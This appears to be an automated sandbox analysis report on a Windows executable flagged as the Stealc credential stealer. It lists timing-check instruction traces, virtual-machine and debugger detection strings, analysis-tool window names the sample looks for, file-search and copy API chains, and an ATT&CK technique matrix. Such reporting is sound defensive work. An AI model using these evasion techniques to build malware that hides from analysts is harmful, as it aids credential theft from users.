                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A70B second address: B1A715 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDF30D0E2FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A715 second address: B1A721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FDF30F40A56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E572 second address: B1E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30D0E303h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FDF30D0E2FBh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21A43 second address: B21A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDF30F40A56h 0x0000000a jmp 00007FDF30F40A65h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B215FE second address: B2160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30D0E2FDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2160F second address: B2161F instructions: 0x00000000 rdtsc 0x00000002 je 00007FDF30F40A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2161F second address: B21623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21623 second address: B21632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21632 second address: B21638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E7B3 second address: B2E7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E4D8 second address: B2E4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDF30D0E2F6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FDF30D0E300h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33D63 second address: B33D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDF30F40A66h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33D87 second address: B33D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33D8D second address: B33D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33D92 second address: B33D97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4689F second address: B468A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B468A5 second address: B468AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B468AB second address: B468B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46F41 second address: B46F74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDF30D0E305h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDF30D0E2FEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FDF30D0E2F6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46F74 second address: B46F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B496E6 second address: B496EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B496EC second address: B496F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B496F0 second address: B49700 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDF30D0E2FEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C7E3 second address: B5C7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C7E9 second address: B5C806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68F91 second address: B68FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A68h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C45 second address: B68C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C49 second address: B68C6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FDF30F40A67h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C6E second address: B68C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C74 second address: B68C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C78 second address: B68C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B789F9 second address: B789FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B789FF second address: B78A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78CE4 second address: B78CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78CEC second address: B78CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7925E second address: B79262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79262 second address: B79266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B796A4 second address: B796B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A5Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B796B5 second address: B796C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FDF30D0E2F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B188 second address: B7B197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDF30F40A56h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B197 second address: B7B19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B19D second address: B7B1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B1A1 second address: B7B1B5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FDF30D0E2F6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7DDF9 second address: B7DDFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F420 second address: B7F437 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30D0E2F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDF30D0E2FBh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80D98 second address: B80D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0283 second address: 51E0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0287 second address: 51E028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E028D second address: 51E0293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0293 second address: 51E02B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDF30F40A60h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E02B4 second address: 51E02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E02B8 second address: 51E02BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E02EC second address: 51E0331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDF30D0E2FEh 0x0000000f push eax 0x00000010 jmp 00007FDF30D0E2FBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDF30D0E300h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0331 second address: 51E0337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0337 second address: 51E0366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f mov dh, 4Eh 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDF30D0E301h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0366 second address: 51E036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E036C second address: 51E0370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0370 second address: 51E0374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AA83D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0069DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0069E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0069ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0069BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F68A FindFirstFileA,0_2_0069F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00691160 GetSystemInfo,ExitProcess,0_2_00691160
                Source: file.exe, file.exe, 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,U&i
                Source: file.exe, 00000000.00000002.2117942451.0000000001292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0{,
                Source: file.exe, 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13589
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13586
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13609
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13641
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006945C0 VirtualProtect ?,00000004,00000100,000000000_2_006945C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006A9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9750 mov eax, dword ptr fs:[00000030h]0_2_006A9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006A7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6984, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006A9600
                Source: file.exe, file.exe, 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_006A7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_006A6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006A7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_006A7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.690000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.690000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

